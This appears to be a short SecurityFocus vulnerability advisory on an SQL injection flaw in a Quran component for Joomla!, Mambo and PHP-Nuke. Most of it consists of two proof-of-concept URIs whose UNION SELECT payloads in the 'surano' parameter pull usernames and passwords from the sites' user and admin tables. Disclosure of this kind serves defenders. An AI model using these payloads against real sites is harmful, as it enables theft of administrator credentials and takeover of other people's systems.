Joomla!, Mambo and PHP-Nuke Quran Component SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password),3,4,5+from+mos_users+limit+0,20--

http://www.example.com/modules.php?name=Quran&action=viewayat&surano=-9999/**/union/**/select/**/000,pwd,222,333,444/**/from/**/nuke_authors/*where%20admin1


 

Privacy Statement
Copyright 2010, SecurityFocus